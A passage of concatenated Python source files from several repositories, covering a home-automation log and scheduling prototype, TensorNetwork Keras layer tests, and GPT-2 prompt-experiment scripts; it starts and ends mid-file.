# print("A: len(lines) is ", len(lines), 'n_lines:', n_lines)
""" for i, l in enumerate(lines):
print('Line', i, ':', l)
print('B: Comparison of lines[-1]:')
print('B: and self.newest_log_line')
print(lines[-1][:23])
print(self.newest_log_line[:23])
assert lines[-1][:23] == self.newest_log_line[:23], "First 23?"
assert lines[-1] == self.newest_log_line, "Full length not equal!"
print('After assert.') """
# is the last line in the log file still the newest log line?
if lines[-1][:30] == self.newest_log_line[:30]:
# print('C: right before return')
return # there are no new lines in log file
# print('D: after lines[-1] comparison:')
# print('len(lines) vs. n_lines:')
# print("D: len(lines) is ", len(lines), 'n_lines:', n_lines)
if len(lines) > n_lines: # added a 2nd log file, load all lines
self.load_log_event_lines(lines)
return
for n, line in enumerate(lines): # is newest log line in tail?
if line[:30] == self.newest_log_line[:30]: # found a match line
# print('About to add lines from', n, ' to ', len(lines)-1 )
# for i, l in enumerate(lines[n+1:]):
# print('Line', i, ':', l)
self.load_log_event_lines(lines[n+1:])
return
return
def log_tail(self, n_lines):
""" uses linux "tail" command to get last n_lines from current log file
Called by add_new_log_lines in a thread that is started when HubData is
instantiated.
If n_lines exceeds number of lines in current log file, combine with
next earlier log file; current limit is 1 earlier log file
Parameters:
n_lines (int): number of lines to "tail" from the log file(s).
Returns:
lines (list): lines returned by running os command "tail -n_lines"
"""
n = '-n ' + str(n_lines).strip() # prepare -n argument
tail = subprocess.run(['tail', n, self.log_file],
capture_output=True, text=True)
lines = tail.stdout.splitlines() # these lines are from current log file
if len(lines) < n_lines: # we got fewer lines than requested;
# so we add the entire next-oldest log file for testing purposes,
# and return the lines from both files, first the next-oldest lines
# followed by all the lines from the current log file.
logs = list(self.log_dir.glob('*log*')) # list of log files
logs.sort(reverse=True) # First, sort the entire list reversed
with open(logs[0], 'r') as f: # then read the first dated log file
lines1 = f.readlines() # which has lines preceding current log file
lines1.extend(lines) # both log files are combined; current log is last
return lines1
# print('Number of lines returned from log_tail:', len(lines))
return lines
def fetch_event_data(self, node, event):
""" fetch some specified data from event logs or images
This fetches data from the self.event_data dict() that holds event data.
Data returned is either 'current' or 'previous', or both, where
'current' is the most recent logged event for a node, and 'previous' is
the one immediately preceding it.
Returned data values are always a string, even if representing a number.
Parameters:
node (str): what node to fetch data for, e.g., barn
event (str): what event or measurement, e.g. temperature or motion
Returns:
(2 tuples): (current, previous): with each tuple containing:
datetime (datetime): the datetime associated with the event
value (str): the fetched data item, e.g. '77' for temperature
"""
node = node.strip().lower() # all string values in event_data are
event = event.strip().lower() # already stripped and lower case
with self.event_data_lock: # acquire lock to work with event_data updates
event_type = self.event_data.get(node, None)
if event_type:
event_deque = event_type.get(event, None)
if event_deque:
current = event_deque[0] # the most recent date & value
if len(event_deque) > 1:
previous = event_deque[1] # the previous date & value
else:
previous = None
return (current, previous)
else:
return None, " ".join(["Don't know", node, event])
else:
return None, " ".join(["Don't know", node])
```
#### File: librarian/helpers/schedules.py
```python
import sys
import pprint
import logging
import schedule
import threading
import subprocess
from time import sleep
from pathlib import Path
from datetime import datetime
from collections import deque
from helpers.comms.gmail import Gmail
from helpers.utils import YamlOptionsError
log = logging.getLogger(__name__)
class Schedule:
""" Methods and attributes to manage schedules.
Provides a variety of classes to hold scheduled tasks, update them and answer
queries about them.
Parameters:
settings (Settings object): settings object created from YAML file
"""
def __init__(self, settings, gmail):
# get schedules dictionary from yaml file
schedules = settings.schedules
self.gmail = gmail
if schedules: # at least one scheduled item in yaml
schedule_types = self.load_schedule_data(schedules) # e.g., reminders
s = self.setup_schedule(schedule_types)
self.schedule_run(s) # run a thread that runs scheduled tasks
def load_schedule_data(self, schedules):
""" load schedule data from yaml file dictionary
Parameters
schedules (dict): schedule items in yaml file
Returns:
schedule_types (list): list of all the requested schedule items
"""
schedule_types = []
valid_schedule_types = ['backups', 'reminders']
for s_type in valid_schedule_types:
sched = schedules.get(s_type, {})
if sched: # not empty
schedule_types.append(sched)
# print('schedule_types', *schedule_types)
return schedule_types
def setup_schedule(self, schedule_types):
""" load schedule data from yaml file dictionary
Parameters:
schedule_types (list): schedule items in yaml file
"""
for event_type in schedule_types: # e.g., reminders, backups, etc.
for _, event_specs in event_type.items(): # events are nested dictionaries from yaml
if 'message' in event_specs: # this event action is 'send message'
# days = event_specs.get('days', 'all') # maybe in future?
times = event_specs.get('times', [])
# times is a list of times in strings, like '10:30'
# print('list of times', *times)
message = event_specs.get('message', '')
# print('message:', message)
channel = event_specs.get('channel', '')
# print('channel:', channel)
phone = event_specs.get('phone', '')
# print('phone:', phone)
func = self.send_sms
args = (phone, message)
for t in times:
schedule.every().day.at(t).do(self.send_sms, phone, message)
# print('A: Number of timed jobs:', len(schedule.jobs))
return schedule
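# A sketch of a 'reminders' entry this method expects, with keys taken from
# the .get() calls above; the values (and the reminder name) are
# illustrative assumptions:
#
#   schedules:
#     reminders:
#       water_garden:
#         times: ['10:30', '17:00']
#         message: Water the garden
#         channel: gmail
#         phone: '8885551212'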
def send_sms(self, phone, message):
""" send an SMS message
Sends an SMS message using the Gmail SMS interface.
Parameters
phone (str): phone number to send SMS message to
message (str): message to send via SMS
"""
# print('Sent:', message, 'To:', phone, ' -- at', datetime.now().isoformat())
self.gmail.gmail_send_SMS(phone, message)
def run_backups(self, source, destination):
# a possible setup of the backup section of schedules is in example3.yaml
pass
def schedule_run(self, schedule):
""" run all scheduled jobs that have been setup in schedule
Parameters:
schedule (schedule object): contains all scheduled jobs
"""
if len(schedule.jobs): # no need to start thread if no jobs in queue
t = threading.Thread(target=self.scheduler_thread)
# print('Starting scheduler thread')
t.daemon = True # allows this thread to be auto-killed on program exit
t.name = 'Scheduler Thread' # naming the thread helps with debugging
t.start()
def scheduler_thread(self):
while True:
schedule.run_pending()
sleep(1)
```
#### File: librarian/helpers/utils.py
```python
import os
import sys
import time
import signal
import logging
import psutil
import multiprocessing
from time import sleep # sleep, os and psutil are used by StallWatcher below
def clean_shutdown_when_killed(signum, *args):
"""Close all connections cleanly and log shutdown
This function will be called when SIGTERM is received from OS
or if the program is killed by "kill" command. It then raises
KeyboardInterrupt to close all resources and log the shutdown.
"""
logging.warning('SIGTERM detected, shutting down')
sys.exit()
def interval_timer(interval, action):
""" Call the function 'action' every 'interval' seconds
This is typically used in a thread, since it blocks while it is sleeping
between action calls. For example, when a check_temperature sensor is
instantiated, this timer is started in a thread to call the
check_temperature function at specified intervals.
Parameters:
interval (int): How often to call the function 'action' in seconds
action (function): Function to call
"""
next_time = time.time() + interval
while True:
time.sleep(max(0, next_time - time.time()))
try:
action()
except (KeyboardInterrupt, SystemExit):
logging.warning('Ctrl-C was pressed or SIGTERM was received.')
raise
except Exception:
logging.exception('Error in interval_timer')
next_time += (time.time() - next_time) // interval * interval + interval
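# Minimal usage sketch, following the pattern described in the docstring:
# run interval_timer in a daemon thread (it blocks), calling a hypothetical
# check_temperature() every 60 seconds.
#
#   import threading
#   t = threading.Thread(target=interval_timer, args=(60, check_temperature))
#   t.daemon = True
#   t.start()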
class YamlOptionsError(Exception):
pass
class Patience:
"""Timing class using system ALARM signal.
When instantiated, starts a timer using the system SIGALRM signal. To be
used in a with clause to allow a blocking task to be interrupted if it
does not return in specified number of seconds.
See main event loop in Imagenode.py for Usage Example
Parameters:
seconds (int): number of seconds to wait before raising exception
"""
class Timeout(Exception):
pass
def __init__(self, seconds):
self.seconds = seconds
def __enter__(self):
signal.signal(signal.SIGALRM, self.raise_timeout)
signal.alarm(self.seconds)
def __exit__(self, *args):
signal.alarm(0) # disable alarm
def raise_timeout(self, *args):
raise Patience.Timeout()
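# Example usage (a sketch; 'read_frame' stands in for any blocking call):
#   try:
#       with Patience(5):
#           frame = read_frame()
#   except Patience.Timeout:
#       logging.warning('read_frame() did not return within 5 seconds')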
class StallWatcher:
def __init__(self):
self.stall_p = None
if settings.stall_watcher: # stall_watcher option set to True
pid = os.getpid()
self.stall_p = multiprocessing.Process(daemon=True,
args=((pid, self.patience,)),
target=self.stall_watcher)
self.stall_p.start()
def stall_watcher(self, pid, patience):
""" Watch the main process cpu_times.user; sys.exit() if not advancing
Parameters:
pid (int): process ID of the main imagenode process
patience (int): how long to wait for each check repeated check
"""
p = psutil.Process(pid)
main_time = p.cpu_times().user
sleep_time = patience
sleep(sleep_time)
while True:
last_main_time = main_time
main_time = p.cpu_times().user
delta_time = round(abs(main_time - last_main_time))
if delta_time < 1:
os.kill(pid, signal.SIGTERM) # p.terminate() # or os.kill(pid, signal.SIGTERM)
sys.exit()
sleep(sleep_time)
```
#### File: librarian-prototype/librarian/test_schedule.py
```python
import schedule
from time import sleep
from datetime import datetime
def job(n):
print('Running job', n, 'at', datetime.now().isoformat())
schedule.every().day.at("22:38").do(job, 1)
schedule.every().day.at("22:55").do(job, 2)
schedule.every().day.at("22:56").do(job, 3)
while True:
schedule.run_pending()
sleep(1)
```
|
{
"source": "jeff-bezos-amazon/TensorNetwork",
"score": 3
}
|
#### File: TensorNetwork/tensornetwork/backend_contextmanager.py
```python
from typing import Text, Union
from tensornetwork.backends.abstract_backend import AbstractBackend
from tensornetwork.backends import backend_factory
class DefaultBackend():
"""Context manager for setting up backend for nodes"""
def __init__(self, backend: Union[Text, AbstractBackend]) -> None:
if not isinstance(backend, (Text, AbstractBackend)):
raise ValueError("Item passed to DefaultBackend "
"must be Text or BaseBackend")
self.backend = backend
def __enter__(self):
_default_backend_stack.stack.append(self)
def __exit__(self, exc_type, exc_val, exc_tb):
_default_backend_stack.stack.pop()
class _DefaultBackendStack():
"""A stack to keep track default backends context manager"""
def __init__(self):
self.stack = []
self.default_backend = "numpy"
def get_current_backend(self):
return self.stack[-1].backend if self.stack else self.default_backend
_default_backend_stack = _DefaultBackendStack()
def get_default_backend():
return _default_backend_stack.get_current_backend()
def set_default_backend(backend: Union[Text, AbstractBackend]) -> None:
if _default_backend_stack.stack:
raise AssertionError("The default backend should not be changed "
"inside the backend context manager")
if not isinstance(backend, (Text, AbstractBackend)):
raise ValueError("Item passed to set_default_backend "
"must be Text or BaseBackend")
if isinstance(backend, Text) and backend not in backend_factory._BACKENDS:
raise ValueError(f"Backend '{backend}' was not found.")
_default_backend_stack.default_backend = backend
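# Example usage (a sketch based on the context manager and setter above):
#   set_default_backend("numpy")           # process-wide default
#   with DefaultBackend("tensorflow"):
#       pass                               # nodes built here use the tensorflow backend
#   print(get_default_backend())           # -> "numpy" again outside the block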
```
#### File: tensornetwork/tn_keras/test_layer.py
```python
import pytest
import numpy as np
import math
import os
import shutil
from tensorflow.keras import backend as K
from tensorflow.keras.models import Sequential, load_model # type: ignore
import tensorflow as tf
from tensornetwork.tn_keras.dense import DenseDecomp
from tensornetwork.tn_keras.mpo import DenseMPO
from tensornetwork.tn_keras.condenser import DenseCondenser
from tensornetwork.tn_keras.expander import DenseExpander
from tensornetwork.tn_keras.entangler import DenseEntangler
from tensorflow.keras.layers import Dense # type: ignore
@pytest.fixture(params=[512])
def dummy_data(request):
np.random.seed(42)
# Generate dummy data for use in tests
data = np.random.randint(10, size=(1000, request.param))
labels = np.concatenate((np.ones((500, 1)), np.zeros((500, 1))), axis=0)
return data, labels
@pytest.fixture(params=[
'DenseDecomp', 'DenseMPO', 'DenseCondenser', 'DenseExpander',
'DenseEntangler', 'DenseEntanglerAsymmetric'
])
def make_model(dummy_data, request):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
if request.param == 'DenseMPO':
model = Sequential()
model.add(
DenseMPO(data.shape[1],
num_nodes=int(math.log(int(data.shape[1]), 8)),
bond_dim=8,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
model.add(Dense(1, activation='sigmoid'))
elif request.param == 'DenseDecomp':
model = Sequential()
model.add(
DenseDecomp(512,
decomp_size=128,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
model.add(Dense(1, activation='sigmoid'))
elif request.param == 'DenseCondenser':
model = Sequential()
model.add(
DenseCondenser(exp_base=2,
num_nodes=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
model.add(Dense(1, activation='sigmoid'))
elif request.param == 'DenseExpander':
model = Sequential()
model.add(
DenseExpander(exp_base=2,
num_nodes=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
model.add(Dense(1, activation='sigmoid'))
elif request.param == 'DenseEntangler':
num_legs = 3
leg_dim = round(data.shape[-1]**(1. / num_legs))
assert leg_dim**num_legs == data.shape[-1]
model = Sequential()
model.add(
DenseEntangler(leg_dim**num_legs,
num_legs=num_legs,
num_levels=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
model.add(Dense(1, activation='sigmoid'))
elif request.param == 'DenseEntanglerAsymmetric':
num_legs = 3
leg_dim = round(data.shape[-1]**(1. / num_legs))
assert leg_dim**num_legs == data.shape[-1]
model = Sequential()
model.add(
DenseEntangler((leg_dim * 2)**num_legs,
num_legs=num_legs,
num_levels=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
model.add(Dense(1, activation='sigmoid'))
return model
def test_train(dummy_data, make_model):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
tf.random.set_seed(0)
data, labels = dummy_data
model = make_model
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
# Train the model for 10 epochs
history = model.fit(data, labels, epochs=10, batch_size=32)
# Check that loss decreases and accuracy increases
assert history.history['loss'][0] > history.history['loss'][-1]
assert history.history['accuracy'][0] < history.history['accuracy'][-1]
def test_weights_change(dummy_data, make_model):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
tf.random.set_seed(0)
data, labels = dummy_data
model = make_model
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
before = model.get_weights()
model.fit(data, labels, epochs=5, batch_size=32)
after = model.get_weights()
# Make sure every layer's weights changed
for i, _ in enumerate(before):
assert (after[i] != before[i]).any()
def test_output_shape(dummy_data, make_model):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
data = K.constant(data)
input_shape = data.shape
model = make_model
actual_output_shape = model(data).shape
expected_output_shape = model.compute_output_shape(input_shape)
np.testing.assert_equal(expected_output_shape, actual_output_shape)
@pytest.fixture(params=[(100, 10, 10, 512), (100, 512), (20, 10, 512)])
def high_dim_data(request):
np.random.seed(42)
# Generate dummy data for use in tests
data = np.random.randint(10, size=request.param)
return data
@pytest.fixture(params=[
'DenseDecomp', 'DenseMPO', 'DenseCondenser', 'DenseExpander',
'DenseEntangler'
])
def make_high_dim_model(high_dim_data, request):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data = high_dim_data
if request.param == 'DenseMPO':
model = Sequential()
model.add(
DenseMPO(data.shape[-1],
num_nodes=int(math.log(int(data.shape[-1]), 8)),
bond_dim=8,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
elif request.param == 'DenseDecomp':
model = Sequential()
model.add(
DenseDecomp(512,
decomp_size=128,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
elif request.param == 'DenseCondenser':
model = Sequential()
model.add(
DenseCondenser(exp_base=2,
num_nodes=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
elif request.param == 'DenseExpander':
model = Sequential()
model.add(
DenseExpander(exp_base=2,
num_nodes=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
elif request.param == 'DenseEntangler':
num_legs = 3
leg_dim = round(data.shape[-1]**(1. / num_legs))
assert leg_dim**num_legs == data.shape[-1]
model = Sequential()
model.add(
DenseEntangler(leg_dim**num_legs,
num_legs=num_legs,
num_levels=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
return data, model
def test_higher_dim_input_output_shape(make_high_dim_model):
# pylint: disable=redefined-outer-name
data, model = make_high_dim_model
actual_output_shape = model(data).shape
expected_output_shape = model.compute_output_shape(data.shape)
np.testing.assert_equal(expected_output_shape, actual_output_shape)
def test_decomp_num_parameters(dummy_data):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
output_dim = 256
decomp_size = 128
model = Sequential()
model.add(
DenseDecomp(output_dim,
decomp_size=decomp_size,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
# num_params = a_params + b_params + bias_params
expected_num_parameters = (data.shape[1] * decomp_size) + (
decomp_size * output_dim) + output_dim
np.testing.assert_equal(expected_num_parameters, model.count_params())
def test_mpo_num_parameters(dummy_data):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
output_dim = data.shape[1]
num_nodes = int(math.log(data.shape[1], 8))
bond_dim = 8
model = Sequential()
model.add(
DenseMPO(output_dim,
num_nodes=num_nodes,
bond_dim=bond_dim,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
in_leg_dim = math.ceil(data.shape[1]**(1. / num_nodes))
out_leg_dim = math.ceil(output_dim**(1. / num_nodes))
# num_params = num_edge_node_params + num_middle_node_params + bias_params
expected_num_parameters = (2 * in_leg_dim * bond_dim * out_leg_dim) + (
(num_nodes - 2) * in_leg_dim * bond_dim * bond_dim *
out_leg_dim) + output_dim
np.testing.assert_equal(expected_num_parameters, model.count_params())
def test_condenser_num_parameters(dummy_data):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
exp_base = 2
num_nodes = 3
model = Sequential()
model.add(
DenseCondenser(exp_base=exp_base,
num_nodes=num_nodes,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
output_dim = data.shape[-1] // (exp_base**num_nodes)
# num_params = (num_nodes * num_node_params) + num_bias_params
expected_num_parameters = (num_nodes * output_dim * output_dim *
exp_base) + output_dim
np.testing.assert_equal(expected_num_parameters, model.count_params())
def test_expander_num_parameters(dummy_data):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
exp_base = 2
num_nodes = 3
model = Sequential()
model.add(
DenseExpander(exp_base=exp_base,
num_nodes=num_nodes,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
output_dim = data.shape[-1] * (exp_base**num_nodes)
# num_params = (num_nodes * num_node_params) + num_bias_params
expected_num_parameters = (num_nodes * data.shape[-1] * data.shape[-1] *
exp_base) + output_dim
np.testing.assert_equal(expected_num_parameters, model.count_params())
def test_entangler_num_parameters(dummy_data):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
num_legs = 3
num_levels = 3
leg_dim = round(data.shape[-1]**(1. / num_legs))
assert leg_dim**num_legs == data.shape[-1]
model = Sequential()
model.add(
DenseEntangler(leg_dim**num_legs,
num_legs=num_legs,
num_levels=num_levels,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
# num_params = entangler_node_params + bias_params
expected_num_parameters = num_levels * (num_legs - 1) * (leg_dim**4) + (
leg_dim**num_legs)
np.testing.assert_equal(expected_num_parameters, model.count_params())
@pytest.mark.parametrize('num_levels', list(range(1, 4)))
@pytest.mark.parametrize('num_legs', list(range(2, 6)))
@pytest.mark.parametrize('leg_dims', [(4, 8), (8, 4)])
def test_entangler_asymmetric_num_parameters_output_shape(num_legs,
num_levels,
leg_dims):
leg_dim, out_leg_dim = leg_dims
data_shape = (leg_dim ** num_legs,)
model = Sequential()
model.add(
DenseEntangler(out_leg_dim**num_legs,
num_legs=num_legs,
num_levels=num_levels,
use_bias=True,
activation='relu',
input_shape=data_shape))
primary = leg_dim
secondary = out_leg_dim
if leg_dim > out_leg_dim:
primary, secondary = secondary, primary
expected_num_parameters = (num_levels - 1) * (num_legs - 1) * (primary**4) + (
num_legs - 2) * primary**3 * secondary + primary**2 * secondary**2 + (
out_leg_dim**num_legs)
np.testing.assert_equal(expected_num_parameters, model.count_params())
data = np.random.randint(10, size=(10, data_shape[0]))
out = model(data)
np.testing.assert_equal(out.shape, (data.shape[0], out_leg_dim**num_legs))
def test_config(make_model):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
model = make_model
expected_num_parameters = model.layers[0].count_params()
# Serialize model and use config to create new layer
model_config = model.get_config()
layer_config = model_config['layers'][0]['config']
if 'mpo' in model.layers[0].name:
new_model = DenseMPO.from_config(layer_config)
elif 'decomp' in model.layers[0].name:
new_model = DenseDecomp.from_config(layer_config)
elif 'condenser' in model.layers[0].name:
new_model = DenseCondenser.from_config(layer_config)
elif 'expander' in model.layers[0].name:
new_model = DenseExpander.from_config(layer_config)
elif 'entangler' in model.layers[0].name:
new_model = DenseEntangler.from_config(layer_config)
# Build the layer so we can count params below
new_model.build(layer_config['batch_input_shape'])
# Check that original layer had same num params as layer built from config
np.testing.assert_equal(expected_num_parameters, new_model.count_params())
def test_model_save(dummy_data, make_model, tmp_path):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, labels = dummy_data
model = make_model
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
# Train the model for 5 epochs
model.fit(data, labels, epochs=5, batch_size=32)
for save_path in ['test_model', 'test_model.h5']:
# Save model to a SavedModel folder or h5 file, then load model
save_path = tmp_path / save_path
model.save(save_path)
loaded_model = load_model(save_path)
# Clean up SavedModel folder
if os.path.isdir(save_path):
shutil.rmtree(save_path)
# Clean up h5 file
if os.path.exists(save_path):
os.remove(save_path)
# Compare model predictions and loaded_model predictions
np.testing.assert_equal(model.predict(data), loaded_model.predict(data))
```
|
{
"source": "jeffbinder/boolean-prompting",
"score": 3
}
|
#### File: jeffbinder/boolean-prompting/discouraging_words.py
```python
import codecs
import nltk
import random
import scipy.stats
from generation_utils import *
model_type = 'gpt2'
model_name_or_path = 'gpt2-xl'
device = 'cuda'
length = 300
do_sample = True
temperature = 0.6
top_k = 5
top_p = 0.5
repetition_penalty = 1.5
num_return_sequences = 10
num_batches = 100
seed = 14891435220765460437
experiment_name = "snake~legs"
prompt_v1 = '''Scientists recently discovered a new species of snake. Here is a description of it:'''
prompt_v2 = '''Scientists recently discovered a new species of snake{~ with legs}. Here is a description of it:'''
words_to_count = [("leg", "legs", "legged"), ("fur", "furred", "furry"), ("hair", "hairs", "haired", "hairy")]
barnard_test_alternative = "greater"
f1 = codecs.open(f"discouraging-results/{experiment_name}-v1", "w", "utf8")
f2 = codecs.open(f"discouraging-results/{experiment_name}-v2", "w", "utf8")
# Initialize the model and tokenizer
torch.manual_seed(seed)
try:
model_class, tokenizer_class = MODEL_CLASSES[model_type]
except KeyError:
raise KeyError("the model {} you specified is not supported. You are welcome to add it and open a PR :)".format(model_type))
tokenizer = tokenizer_class.from_pretrained(model_name_or_path)
model = model_class.from_pretrained(model_name_or_path)
model.to(device)
model.eval()
def adjust_length_to_model(length, max_sequence_length):
if length < 0 and max_sequence_length > 0:
length = max_sequence_length
elif 0 < max_sequence_length < length:
length = max_sequence_length # No generation bigger than model size
elif length < 0:
length = MAX_LENGTH # avoid infinite loop
return length
length = adjust_length_to_model(length, max_sequence_length=model.config.max_position_embeddings)
counts_1 = {word: 0 for word in words_to_count}
counts_2 = {word: 0 for word in words_to_count}
for batch_num in range(num_batches):
print(f"Batch {batch_num}")
for i, prompt in enumerate([prompt_v1, prompt_v2]):
# Needed to avoid weirdness with Torch's random number generator
output_sequences = model.generate(
prompt=prompt,
tokenizer=tokenizer,
max_length=length,
temperature=temperature,
top_k=top_k,
top_p=top_p,
repetition_penalty=repetition_penalty,
do_sample=do_sample,
num_return_sequences=num_return_sequences,
pad_token_id = 0,
verbose=True,
)
# Remove the batch dimension when returning multiple sequences
if len(output_sequences.shape) > 2:
output_sequences.squeeze_()
generated_sequences = []
for generated_sequence_idx, generated_sequence in enumerate(output_sequences):
generated_sequence = generated_sequence.tolist()
generated_sequence = [idx for idx in generated_sequence if idx != 0]
idx = generated_sequence_idx + batch_num * num_return_sequences
# Decode text
generated_text = tokenizer.decode(generated_sequence, clean_up_tokenization_spaces=True)
f = f1 if i == 0 else f2
f.write(f"Sequence {idx}:\n{generated_text}\n\n----------\n")
counts = counts_1 if i == 0 else counts_2
toks = [tok.lower() for tok in nltk.word_tokenize(generated_text)]
for word in words_to_count:
variant_found = False
for variant in word:
if variant in toks:
variant_found = True
break
if variant_found:
counts[word] += 1
f1.flush()
f2.flush()
print("word\tv1\tv2")
n = num_return_sequences * (batch_num+1)
for word in words_to_count:
x1 = counts_1[word]
x2 = counts_2[word]
print(f"{word}\t{x1}/{n}\t{x2}/{n}")
print("word\tv1\tv2\tp")
n = num_return_sequences * num_batches
for word in words_to_count:
x1 = counts_1[word]
x2 = counts_2[word]
o = scipy.stats.barnard_exact([[x1, x2], [n-x1, n-x2]], alternative=barnard_test_alternative)
p = o.pvalue
print(f"{word}\t{x1}/{n}\t{x2}/{n}\t{p}")
f1.close()
f2.close()
```
#### File: jeffbinder/boolean-prompting/generate.py
```python
from generation_utils import *
model_type = 'gpt2'
model_name_or_path = 'gpt2-xl'
device = 'cuda'
length = 100
do_sample = True
temperature = 0.6
k = 5
p = 0.5
repetition_penalty = 1.5
num_return_sequences = 10
overlap_factor = 0.25
prompt_text = '''Scientists recently discovered a new species of {serpent~snake}. Here is a description of it:'''
# Initialize the model and tokenizer
try:
model_class, tokenizer_class = MODEL_CLASSES[model_type]
except KeyError:
raise KeyError("the model {} you specified is not supported. You are welcome to add it and open a PR :)".format(model_type))
tokenizer = tokenizer_class.from_pretrained(model_name_or_path)
model = model_class.from_pretrained(model_name_or_path)
model.to(device)
model.eval()
def adjust_length_to_model(length, max_sequence_length):
if length < 0 and max_sequence_length > 0:
length = max_sequence_length
elif 0 < max_sequence_length < length:
length = max_sequence_length # No generation bigger than model size
elif length < 0:
length = MAX_LENGTH # avoid infinite loop
return length
length = adjust_length_to_model(length, max_sequence_length=model.config.max_position_embeddings)
import time
start_time = time.time()
output_sequences = model.generate(
prompt=prompt_text,
overlap_factor=overlap_factor,
tokenizer=tokenizer,
max_length=length,
temperature=temperature,
top_k=k,
top_p=p,
repetition_penalty=repetition_penalty,
do_sample=do_sample,
num_return_sequences=num_return_sequences,
pad_token_id=0,
verbose=True,
)
print(f"Time: {time.time() - start_time}s")
# Remove the batch dimension when returning multiple sequences
if len(output_sequences.shape) > 2:
output_sequences.squeeze_()
generated_sequences = []
for generated_sequence_idx, generated_sequence in enumerate(output_sequences):
generated_sequence = generated_sequence.tolist()
generated_sequence = [idx for idx in generated_sequence if idx != 0]
# Decode text
generated_text = tokenizer.decode(generated_sequence, clean_up_tokenization_spaces=True)
if num_return_sequences > 1:
print(f'Generated sequence {generated_sequence_idx}:')
print(generated_text)
```
#### File: jeffbinder/boolean-prompting/lambada_score.py
```python
import json
import math
import numpy as np
import nltk
import os
import re
import sys
import torch
import transformers
from generation_utils import *
model_type = 'gpt2'
model_name_or_path = 'gpt2'
device = 'cuda'
test_mode = 'token'
repetition_penalty = None
suppress_punctuation = True
batch_size = 20
prompting_mode = 'sentence' # One of 'default', 'blank', 'fixed', 'word', 'phrase', 'sentence', 'sentence|blank', 'sentence|word', 'sentence|phrase', 'sentence|word|phrase'
prefix = '[...]'
fixed_negative_prompt = '[...] and'
finetune_sentence_tokenizer = False
regularize_text = False
overlap_factor = 0.0
re_phrase_boundary = re.compile('[,.:;?!"“”]')
# Initialize the model and tokenizer
model_class = MODEL_CLASSES[model_type][0]
tokenizer_class = MODEL_CLASSES[model_type][1]
tokenizer = tokenizer_class.from_pretrained(model_name_or_path)
model = model_class.from_pretrained(model_name_or_path)
model.to(device)
model.eval()
if model_type == 'xlm':
re_word = re.compile(r"^ ?[A-Za-z']+(</w>)?$")
re_final_punct = re.compile(r"^.*?([^A-Za-z' ]+(</w>)?)$")
re_first_punct_on = re.compile(r"^.*?([^@A-Za-z' ]+.*)$")
elif model_type == 'ctrl':
re_word = re.compile(r"^ ?[@A-Za-z']+$")
re_final_punct = re.compile(r"^.*?([^@A-Za-z' ]+)$")
re_first_punct_on = re.compile(r"^.*?([^@A-Za-z' ]+.*)$")
elif model_type == 'xlnet':
re_word = re.compile(r"^ ?[A-Za-z'▁]+$")
else:
re_word = re.compile(r"^ ?[A-Za-z']+$")
if model_type == 'xlm':
def is_word_piece(idx):
tok = tokenizer.convert_ids_to_tokens([idx])[0]
return re_word.match(tok) and not tok.endswith('</w>')
elif model_type == 'ctrl':
def is_word_piece(idx):
tok = tokenizer.convert_ids_to_tokens([idx])[0]
return tok.endswith('@@')
elif model_type == 'xlnet':
def is_word_piece(idx):
tok = tokenizer.convert_ids_to_tokens([idx])[0]
return re_word.match(tok) and not tok.startswith('▁')
else:
def is_word_piece(idx):
tok = tokenizer.convert_ids_to_tokens([idx])[0]
string = tokenizer.convert_tokens_to_string([tok])
return re_word.match(string) and not string.startswith(' ')
def is_punctuation(idx):
tok = tokenizer.convert_ids_to_tokens([idx])[0]
string = tokenizer.convert_tokens_to_string([tok])
return not re_word.match(string)
punctuation = []
word_pieces = []
vocab = tokenizer.get_vocab()
vocab_size = len(vocab)
for tok in vocab:
idx = vocab[tok]
tok = tokenizer.convert_tokens_to_string([tok])
if not re_word.match(tok):
punctuation.append([idx])
if model_type in ('xlm', 'ctrl') and test_mode == 'token' and is_word_piece(idx):
word_pieces.append([idx])
bos_token = tokenizer.bos_token or tokenizer.cls_token or ''
if model_type == 'ctrl':
bos_token = 'Books '
# The models have word pieces at the beginning of the word, so we must add in an offset when
# locating word boundaries
if model_type in ('xlm', 'ctrl'):
word_piece_offset = 1
else:
word_piece_offset = 0
if model_type in ('xlm', 'ctrl') and test_mode == 'token':
# Do not allow the prediction of word pieces in token mode because they cannot come at the
# end of sentence in these models
bad_words_ids = punctuation.copy() if suppress_punctuation else []
bad_words_ids += word_pieces
elif model_type in ('openai-gpt', 'gpt2', 'xlnet') and test_mode == 'word':
